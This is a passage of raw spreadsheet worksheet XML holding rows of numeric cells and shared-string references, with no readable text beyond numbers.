      <c r="B32708" s="2">
        <v>5.7732422E7</v>
      </c>
      <c r="C32708" s="2" t="s">
        <v>31481</v>
      </c>
      <c r="D32708" s="2">
        <v>1.0</v>
      </c>
      <c r="E32708" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32708" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32709" ht="15.75" customHeight="1">
      <c r="A32709" s="1">
        <v>10570.0</v>
      </c>
      <c r="B32709" s="2">
        <v>1.295657E7</v>
      </c>
      <c r="C32709" s="2" t="s">
        <v>31482</v>
      </c>
      <c r="D32709" s="2">
        <v>1.0</v>
      </c>
      <c r="E32709" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32709" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32710" ht="15.75" customHeight="1">
      <c r="A32710" s="1">
        <v>10612.0</v>
      </c>
      <c r="B32710" s="2">
        <v>1.372033E7</v>
      </c>
      <c r="C32710" s="2" t="s">
        <v>31483</v>
      </c>
      <c r="D32710" s="2">
        <v>1.0</v>
      </c>
      <c r="E32710" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32710" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32711" ht="15.75" customHeight="1">
      <c r="A32711" s="1">
        <v>10752.0</v>
      </c>
      <c r="B32711" s="2">
        <v>1.5474597E7</v>
      </c>
      <c r="C32711" s="2" t="s">
        <v>31484</v>
      </c>
      <c r="D32711" s="2">
        <v>1.0</v>
      </c>
      <c r="E32711" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32711" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32712" ht="15.75" customHeight="1">
      <c r="A32712" s="1">
        <v>10881.0</v>
      </c>
      <c r="B32712" s="2">
        <v>1.6504932E7</v>
      </c>
      <c r="C32712" s="2" t="s">
        <v>31485</v>
      </c>
      <c r="D32712" s="2">
        <v>1.0</v>
      </c>
      <c r="E32712" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32712" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32713" ht="15.75" customHeight="1">
      <c r="A32713" s="1">
        <v>10957.0</v>
      </c>
      <c r="B32713" s="2">
        <v>1.7182046E7</v>
      </c>
      <c r="C32713" s="2" t="s">
        <v>31486</v>
      </c>
      <c r="D32713" s="2">
        <v>1.0</v>
      </c>
      <c r="E32713" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32713" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32714" ht="15.75" customHeight="1">
      <c r="A32714" s="1">
        <v>11015.0</v>
      </c>
      <c r="B32714" s="2">
        <v>1.780046E7</v>
      </c>
      <c r="C32714" s="2" t="s">
        <v>31487</v>
      </c>
      <c r="D32714" s="2">
        <v>1.0</v>
      </c>
      <c r="E32714" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32714" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32715" ht="15.75" customHeight="1">
      <c r="A32715" s="1">
        <v>11055.0</v>
      </c>
      <c r="B32715" s="2">
        <v>1.8177902E7</v>
      </c>
      <c r="C32715" s="2" t="s">
        <v>31488</v>
      </c>
      <c r="D32715" s="2">
        <v>1.0</v>
      </c>
      <c r="E32715" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32715" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32716" ht="15.75" customHeight="1">
      <c r="A32716" s="1">
        <v>11080.0</v>
      </c>
      <c r="B32716" s="2">
        <v>1.8429354E7</v>
      </c>
      <c r="C32716" s="2" t="s">
        <v>31489</v>
      </c>
      <c r="D32716" s="2">
        <v>1.0</v>
      </c>
      <c r="E32716" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32716" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32717" ht="15.75" customHeight="1">
      <c r="A32717" s="1">
        <v>11195.0</v>
      </c>
      <c r="B32717" s="2">
        <v>1.9868223E7</v>
      </c>
      <c r="C32717" s="2" t="s">
        <v>31490</v>
      </c>
      <c r="D32717" s="2">
        <v>1.0</v>
      </c>
      <c r="E32717" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32717" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32718" ht="15.75" customHeight="1">
      <c r="A32718" s="1">
        <v>11412.0</v>
      </c>
      <c r="B32718" s="2">
        <v>2.165388E7</v>
      </c>
      <c r="C32718" s="2" t="s">
        <v>31491</v>
      </c>
      <c r="D32718" s="2">
        <v>1.0</v>
      </c>
      <c r="E32718" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32718" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32719" ht="15.75" customHeight="1">
      <c r="A32719" s="1">
        <v>11440.0</v>
      </c>
      <c r="B32719" s="2">
        <v>2.1765338E7</v>
      </c>
      <c r="C32719" s="2" t="s">
        <v>31492</v>
      </c>
      <c r="D32719" s="2">
        <v>1.0</v>
      </c>
      <c r="E32719" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32719" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32720" ht="15.75" customHeight="1">
      <c r="A32720" s="1">
        <v>11446.0</v>
      </c>
      <c r="B32720" s="2">
        <v>2.1772168E7</v>
      </c>
      <c r="C32720" s="2" t="s">
        <v>31493</v>
      </c>
      <c r="D32720" s="2">
        <v>1.0</v>
      </c>
      <c r="E32720" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32720" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32721" ht="15.75" customHeight="1">
      <c r="A32721" s="1">
        <v>11448.0</v>
      </c>
      <c r="B32721" s="2">
        <v>2.1775735E7</v>
      </c>
      <c r="C32721" s="2" t="s">
        <v>31494</v>
      </c>
      <c r="D32721" s="2">
        <v>1.0</v>
      </c>
      <c r="E32721" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32721" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32722" ht="15.75" customHeight="1">
      <c r="A32722" s="1">
        <v>11456.0</v>
      </c>
      <c r="B32722" s="2">
        <v>2.1842455E7</v>
      </c>
      <c r="C32722" s="2" t="s">
        <v>31495</v>
      </c>
      <c r="D32722" s="2">
        <v>1.0</v>
      </c>
      <c r="E32722" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32722" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32723" ht="15.75" customHeight="1">
      <c r="A32723" s="1">
        <v>11554.0</v>
      </c>
      <c r="B32723" s="2">
        <v>2.2699631E7</v>
      </c>
      <c r="C32723" s="2" t="s">
        <v>31496</v>
      </c>
      <c r="D32723" s="2">
        <v>1.0</v>
      </c>
      <c r="E32723" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32723" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32724" ht="15.75" customHeight="1">
      <c r="A32724" s="1">
        <v>11581.0</v>
      </c>
      <c r="B32724" s="2">
        <v>2.2833512E7</v>
      </c>
      <c r="C32724" s="2" t="s">
        <v>31497</v>
      </c>
      <c r="D32724" s="2">
        <v>1.0</v>
      </c>
      <c r="E32724" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32724" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32725" ht="15.75" customHeight="1">
      <c r="A32725" s="1">
        <v>11664.0</v>
      </c>
      <c r="B32725" s="2">
        <v>2.3343054E7</v>
      </c>
      <c r="C32725" s="2" t="s">
        <v>31498</v>
      </c>
      <c r="D32725" s="2">
        <v>1.0</v>
      </c>
      <c r="E32725" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32725" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32726" ht="15.75" customHeight="1">
      <c r="A32726" s="1">
        <v>11685.0</v>
      </c>
      <c r="B32726" s="2">
        <v>2.3446239E7</v>
      </c>
      <c r="C32726" s="2" t="s">
        <v>31499</v>
      </c>
      <c r="D32726" s="2">
        <v>1.0</v>
      </c>
      <c r="E32726" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32726" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32727" ht="15.75" customHeight="1">
      <c r="A32727" s="1">
        <v>11745.0</v>
      </c>
      <c r="B32727" s="2">
        <v>2.4091909E7</v>
      </c>
      <c r="C32727" s="2" t="s">
        <v>31500</v>
      </c>
      <c r="D32727" s="2">
        <v>1.0</v>
      </c>
      <c r="E32727" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32727" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32728" ht="15.75" customHeight="1">
      <c r="A32728" s="1">
        <v>11771.0</v>
      </c>
      <c r="B32728" s="2">
        <v>2.4226298E7</v>
      </c>
      <c r="C32728" s="2" t="s">
        <v>31501</v>
      </c>
      <c r="D32728" s="2">
        <v>1.0</v>
      </c>
      <c r="E32728" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32728" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32729" ht="15.75" customHeight="1">
      <c r="A32729" s="1">
        <v>11801.0</v>
      </c>
      <c r="B32729" s="2">
        <v>2.4419068E7</v>
      </c>
      <c r="C32729" s="2" t="s">
        <v>31502</v>
      </c>
      <c r="D32729" s="2">
        <v>1.0</v>
      </c>
      <c r="E32729" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32729" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32730" ht="15.75" customHeight="1">
      <c r="A32730" s="1">
        <v>11802.0</v>
      </c>
      <c r="B32730" s="2">
        <v>2.4419068E7</v>
      </c>
      <c r="C32730" s="2" t="s">
        <v>31503</v>
      </c>
      <c r="D32730" s="2">
        <v>1.0</v>
      </c>
      <c r="E32730" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32730" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32731" ht="15.75" customHeight="1">
      <c r="A32731" s="1">
        <v>11826.0</v>
      </c>
      <c r="B32731" s="2">
        <v>2.4636493E7</v>
      </c>
      <c r="C32731" s="2" t="s">
        <v>31504</v>
      </c>
      <c r="D32731" s="2">
        <v>1.0</v>
      </c>
      <c r="E32731" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32731" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32732" ht="15.75" customHeight="1">
      <c r="A32732" s="1">
        <v>12216.0</v>
      </c>
      <c r="B32732" s="2">
        <v>2.7706294E7</v>
      </c>
      <c r="C32732" s="2" t="s">
        <v>31505</v>
      </c>
      <c r="D32732" s="2">
        <v>1.0</v>
      </c>
      <c r="E32732" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32732" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32733" ht="15.75" customHeight="1">
      <c r="A32733" s="1">
        <v>12260.0</v>
      </c>
      <c r="B32733" s="2">
        <v>2.8017419E7</v>
      </c>
      <c r="C32733" s="2" t="s">
        <v>31506</v>
      </c>
      <c r="D32733" s="2">
        <v>1.0</v>
      </c>
      <c r="E32733" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32733" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32734" ht="15.75" customHeight="1">
      <c r="A32734" s="1">
        <v>12281.0</v>
      </c>
      <c r="B32734" s="2">
        <v>2.8160444E7</v>
      </c>
      <c r="C32734" s="2" t="s">
        <v>31507</v>
      </c>
      <c r="D32734" s="2">
        <v>1.0</v>
      </c>
      <c r="E32734" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32734" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32735" ht="15.75" customHeight="1">
      <c r="A32735" s="1">
        <v>12289.0</v>
      </c>
      <c r="B32735" s="2">
        <v>2.8242199E7</v>
      </c>
      <c r="C32735" s="2" t="s">
        <v>31508</v>
      </c>
      <c r="D32735" s="2">
        <v>1.0</v>
      </c>
      <c r="E32735" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32735" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32736" ht="15.75" customHeight="1">
      <c r="A32736" s="1">
        <v>12404.0</v>
      </c>
      <c r="B32736" s="2">
        <v>2.8988036E7</v>
      </c>
      <c r="C32736" s="2" t="s">
        <v>31509</v>
      </c>
      <c r="D32736" s="2">
        <v>1.0</v>
      </c>
      <c r="E32736" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32736" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32737" ht="15.75" customHeight="1">
      <c r="A32737" s="1">
        <v>12489.0</v>
      </c>
      <c r="B32737" s="2">
        <v>2.9526086E7</v>
      </c>
      <c r="C32737" s="2" t="s">
        <v>31510</v>
      </c>
      <c r="D32737" s="2">
        <v>1.0</v>
      </c>
      <c r="E32737" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32737" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32738" ht="15.75" customHeight="1">
      <c r="A32738" s="1">
        <v>12591.0</v>
      </c>
      <c r="B32738" s="2">
        <v>3.0060614E7</v>
      </c>
      <c r="C32738" s="2" t="s">
        <v>31511</v>
      </c>
      <c r="D32738" s="2">
        <v>1.0</v>
      </c>
      <c r="E32738" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32738" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32739" ht="15.75" customHeight="1">
      <c r="A32739" s="1">
        <v>12849.0</v>
      </c>
      <c r="B32739" s="2">
        <v>3.1767809E7</v>
      </c>
      <c r="C32739" s="2" t="s">
        <v>31512</v>
      </c>
      <c r="D32739" s="2">
        <v>1.0</v>
      </c>
      <c r="E32739" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32739" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32740" ht="15.75" customHeight="1">
      <c r="A32740" s="1">
        <v>12882.0</v>
      </c>
      <c r="B32740" s="2">
        <v>3.1987654E7</v>
      </c>
      <c r="C32740" s="2" t="s">
        <v>31513</v>
      </c>
      <c r="D32740" s="2">
        <v>1.0</v>
      </c>
      <c r="E32740" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32740" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32741" ht="15.75" customHeight="1">
      <c r="A32741" s="1">
        <v>12913.0</v>
      </c>
      <c r="B32741" s="2">
        <v>3.2189574E7</v>
      </c>
      <c r="C32741" s="2" t="s">
        <v>31514</v>
      </c>
      <c r="D32741" s="2">
        <v>1.0</v>
      </c>
      <c r="E32741" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32741" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32742" ht="15.75" customHeight="1">
      <c r="A32742" s="1">
        <v>12998.0</v>
      </c>
      <c r="B32742" s="2">
        <v>3.2802047E7</v>
      </c>
      <c r="C32742" s="2" t="s">
        <v>31515</v>
      </c>
      <c r="D32742" s="2">
        <v>1.0</v>
      </c>
      <c r="E32742" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32742" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32743" ht="15.75" customHeight="1">
      <c r="A32743" s="1">
        <v>13097.0</v>
      </c>
      <c r="B32743" s="2">
        <v>3.3508784E7</v>
      </c>
      <c r="C32743" s="2" t="s">
        <v>31516</v>
      </c>
      <c r="D32743" s="2">
        <v>1.0</v>
      </c>
      <c r="E32743" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32743" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32744" ht="15.75" customHeight="1">
      <c r="A32744" s="1">
        <v>13101.0</v>
      </c>
      <c r="B32744" s="2">
        <v>3.3532359E7</v>
      </c>
      <c r="C32744" s="2" t="s">
        <v>31517</v>
      </c>
      <c r="D32744" s="2">
        <v>1.0</v>
      </c>
      <c r="E32744" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32744" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32745" ht="15.75" customHeight="1">
      <c r="A32745" s="1">
        <v>13108.0</v>
      </c>
      <c r="B32745" s="2">
        <v>3.3533082E7</v>
      </c>
      <c r="C32745" s="2" t="s">
        <v>31518</v>
      </c>
      <c r="D32745" s="2">
        <v>1.0</v>
      </c>
      <c r="E32745" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32745" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32746" ht="15.75" customHeight="1">
      <c r="A32746" s="1">
        <v>13141.0</v>
      </c>
      <c r="B32746" s="2">
        <v>3.3726005E7</v>
      </c>
      <c r="C32746" s="2" t="s">
        <v>31519</v>
      </c>
      <c r="D32746" s="2">
        <v>1.0</v>
      </c>
      <c r="E32746" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32746" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32747" ht="15.75" customHeight="1">
      <c r="A32747" s="1">
        <v>13270.0</v>
      </c>
      <c r="B32747" s="2">
        <v>3.4366139E7</v>
      </c>
      <c r="C32747" s="2" t="s">
        <v>31520</v>
      </c>
      <c r="D32747" s="2">
        <v>1.0</v>
      </c>
      <c r="E32747" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32747" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32748" ht="15.75" customHeight="1">
      <c r="A32748" s="1">
        <v>13344.0</v>
      </c>
      <c r="B32748" s="2">
        <v>3.4694619E7</v>
      </c>
      <c r="C32748" s="2" t="s">
        <v>31521</v>
      </c>
      <c r="D32748" s="2">
        <v>1.0</v>
      </c>
      <c r="E32748" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32748" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32749" ht="15.75" customHeight="1">
      <c r="A32749" s="1">
        <v>13374.0</v>
      </c>
      <c r="B32749" s="2">
        <v>3.4855006E7</v>
      </c>
      <c r="C32749" s="2" t="s">
        <v>31522</v>
      </c>
      <c r="D32749" s="2">
        <v>1.0</v>
      </c>
      <c r="E32749" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32749" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32750" ht="15.75" customHeight="1">
      <c r="A32750" s="1">
        <v>13380.0</v>
      </c>
      <c r="B32750" s="2">
        <v>3.488554E7</v>
      </c>
      <c r="C32750" s="2" t="s">
        <v>31523</v>
      </c>
      <c r="D32750" s="2">
        <v>1.0</v>
      </c>
      <c r="E32750" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32750" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32751" ht="15.75" customHeight="1">
      <c r="A32751" s="1">
        <v>13490.0</v>
      </c>
      <c r="B32751" s="2">
        <v>3.5394762E7</v>
      </c>
      <c r="C32751" s="2" t="s">
        <v>31524</v>
      </c>
      <c r="D32751" s="2">
        <v>1.0</v>
      </c>
      <c r="E32751" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32751" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32752" ht="15.75" customHeight="1">
      <c r="A32752" s="1">
        <v>13545.0</v>
      </c>
      <c r="B32752" s="2">
        <v>3.5643249E7</v>
      </c>
      <c r="C32752" s="2" t="s">
        <v>31525</v>
      </c>
      <c r="D32752" s="2">
        <v>1.0</v>
      </c>
      <c r="E32752" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32752" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32753" ht="15.75" customHeight="1">
      <c r="A32753" s="1">
        <v>13839.0</v>
      </c>
      <c r="B32753" s="2">
        <v>3.6801524E7</v>
      </c>
      <c r="C32753" s="2" t="s">
        <v>31526</v>
      </c>
      <c r="D32753" s="2">
        <v>1.0</v>
      </c>
      <c r="E32753" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32753" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32754" ht="15.75" customHeight="1">
      <c r="A32754" s="1">
        <v>13953.0</v>
      </c>
      <c r="B32754" s="2">
        <v>3.7281746E7</v>
      </c>
      <c r="C32754" s="2" t="s">
        <v>31527</v>
      </c>
      <c r="D32754" s="2">
        <v>1.0</v>
      </c>
      <c r="E32754" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32754" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32755" ht="15.75" customHeight="1">
      <c r="A32755" s="1">
        <v>14031.0</v>
      </c>
      <c r="B32755" s="2">
        <v>3.750169E7</v>
      </c>
      <c r="C32755" s="2" t="s">
        <v>31528</v>
      </c>
      <c r="D32755" s="2">
        <v>1.0</v>
      </c>
      <c r="E32755" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32755" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32756" ht="15.75" customHeight="1">
      <c r="A32756" s="1">
        <v>14108.0</v>
      </c>
      <c r="B32756" s="2">
        <v>3.7767159E7</v>
      </c>
      <c r="C32756" s="2" t="s">
        <v>31529</v>
      </c>
      <c r="D32756" s="2">
        <v>1.0</v>
      </c>
      <c r="E32756" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32756" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32757" ht="15.75" customHeight="1">
      <c r="A32757" s="1">
        <v>14236.0</v>
      </c>
      <c r="B32757" s="2">
        <v>3.830811E7</v>
      </c>
      <c r="C32757" s="2" t="s">
        <v>31530</v>
      </c>
      <c r="D32757" s="2">
        <v>1.0</v>
      </c>
      <c r="E32757" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32757" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32758" ht="15.75" customHeight="1">
      <c r="A32758" s="1">
        <v>14371.0</v>
      </c>
      <c r="B32758" s="2">
        <v>3.8977409E7</v>
      </c>
      <c r="C32758" s="2" t="s">
        <v>31531</v>
      </c>
      <c r="D32758" s="2">
        <v>1.0</v>
      </c>
      <c r="E32758" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32758" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32759" ht="15.75" customHeight="1">
      <c r="A32759" s="1">
        <v>14506.0</v>
      </c>
      <c r="B32759" s="2">
        <v>3.9703335E7</v>
      </c>
      <c r="C32759" s="2" t="s">
        <v>31532</v>
      </c>
      <c r="D32759" s="2">
        <v>1.0</v>
      </c>
      <c r="E32759" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32759" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32760" ht="15.75" customHeight="1">
      <c r="A32760" s="1">
        <v>14581.0</v>
      </c>
      <c r="B32760" s="2">
        <v>4.0128992E7</v>
      </c>
      <c r="C32760" s="2" t="s">
        <v>31533</v>
      </c>
      <c r="D32760" s="2">
        <v>1.0</v>
      </c>
      <c r="E32760" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32760" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32761" ht="15.75" customHeight="1">
      <c r="A32761" s="1">
        <v>14617.0</v>
      </c>
      <c r="B32761" s="2">
        <v>4.0266698E7</v>
      </c>
      <c r="C32761" s="2" t="s">
        <v>31534</v>
      </c>
      <c r="D32761" s="2">
        <v>1.0</v>
      </c>
      <c r="E32761" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32761" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32762" ht="15.75" customHeight="1">
      <c r="A32762" s="1">
        <v>14926.0</v>
      </c>
      <c r="B32762" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C32762" s="2" t="s">
        <v>31535</v>
      </c>
      <c r="D32762" s="2">
        <v>1.0</v>
      </c>
      <c r="E32762" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32762" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32763" ht="15.75" customHeight="1">
      <c r="A32763" s="1">
        <v>14975.0</v>
      </c>
      <c r="B32763" s="2">
        <v>4.1376008E7</v>
      </c>
      <c r="C32763" s="2" t="s">
        <v>31536</v>
      </c>
      <c r="D32763" s="2">
        <v>1.0</v>
      </c>
      <c r="E32763" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32763" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32764" ht="15.75" customHeight="1">
      <c r="A32764" s="1">
        <v>15084.0</v>
      </c>
      <c r="B32764" s="2">
        <v>4.1768606E7</v>
      </c>
      <c r="C32764" s="2" t="s">
        <v>31537</v>
      </c>
      <c r="D32764" s="2">
        <v>1.0</v>
      </c>
      <c r="E32764" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32764" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32765" ht="15.75" customHeight="1">
      <c r="A32765" s="1">
        <v>15108.0</v>
      </c>
      <c r="B32765" s="2">
        <v>4.1837569E7</v>
      </c>
      <c r="C32765" s="2" t="s">
        <v>31538</v>
      </c>
      <c r="D32765" s="2">
        <v>1.0</v>
      </c>
      <c r="E32765" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32765" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32766" ht="15.75" customHeight="1">
      <c r="A32766" s="1">
        <v>15137.0</v>
      </c>
      <c r="B32766" s="2">
        <v>4.1915086E7</v>
      </c>
      <c r="C32766" s="2" t="s">
        <v>31539</v>
      </c>
      <c r="D32766" s="2">
        <v>1.0</v>
      </c>
      <c r="E32766" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32766" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32767" ht="15.75" customHeight="1">
      <c r="A32767" s="1">
        <v>15210.0</v>
      </c>
      <c r="B32767" s="2">
        <v>4.2134667E7</v>
      </c>
      <c r="C32767" s="2" t="s">
        <v>31540</v>
      </c>
      <c r="D32767" s="2">
        <v>1.0</v>
      </c>
      <c r="E32767" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32767" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32768" ht="15.75" customHeight="1">
      <c r="A32768" s="1">
        <v>15271.0</v>
      </c>
      <c r="B32768" s="2">
        <v>4.2358147E7</v>
      </c>
      <c r="C32768" s="2" t="s">
        <v>31541</v>
      </c>
      <c r="D32768" s="2">
        <v>1.0</v>
      </c>
      <c r="E32768" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32768" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32769" ht="15.75" customHeight="1">
      <c r="A32769" s="1">
        <v>15279.0</v>
      </c>
      <c r="B32769" s="2">
        <v>4.2400766E7</v>
      </c>
      <c r="C32769" s="2" t="s">
        <v>31542</v>
      </c>
      <c r="D32769" s="2">
        <v>1.0</v>
      </c>
      <c r="E32769" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32769" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32770" ht="15.75" customHeight="1">
      <c r="A32770" s="1">
        <v>15312.0</v>
      </c>
      <c r="B32770" s="2">
        <v>4.2499425E7</v>
      </c>
      <c r="C32770" s="2" t="s">
        <v>31543</v>
      </c>
      <c r="D32770" s="2">
        <v>1.0</v>
      </c>
      <c r="E32770" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32770" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32771" ht="15.75" customHeight="1">
      <c r="A32771" s="1">
        <v>15367.0</v>
      </c>
      <c r="B32771" s="2">
        <v>4.2724437E7</v>
      </c>
      <c r="C32771" s="2" t="s">
        <v>31544</v>
      </c>
      <c r="D32771" s="2">
        <v>1.0</v>
      </c>
      <c r="E32771" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32771" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32772" ht="15.75" customHeight="1">
      <c r="A32772" s="1">
        <v>15451.0</v>
      </c>
      <c r="B32772" s="2">
        <v>4.3041595E7</v>
      </c>
      <c r="C32772" s="2" t="s">
        <v>31545</v>
      </c>
      <c r="D32772" s="2">
        <v>1.0</v>
      </c>
      <c r="E32772" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32772" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32773" ht="15.75" customHeight="1">
      <c r="A32773" s="1">
        <v>15664.0</v>
      </c>
      <c r="B32773" s="2">
        <v>4.3704846E7</v>
      </c>
      <c r="C32773" s="2" t="s">
        <v>31546</v>
      </c>
      <c r="D32773" s="2">
        <v>1.0</v>
      </c>
      <c r="E32773" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32773" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32774" ht="15.75" customHeight="1">
      <c r="A32774" s="1">
        <v>16125.0</v>
      </c>
      <c r="B32774" s="2">
        <v>4.5497104E7</v>
      </c>
      <c r="C32774" s="2" t="s">
        <v>31547</v>
      </c>
      <c r="D32774" s="2">
        <v>1.0</v>
      </c>
      <c r="E32774" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32774" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32775" ht="15.75" customHeight="1">
      <c r="A32775" s="1">
        <v>16350.0</v>
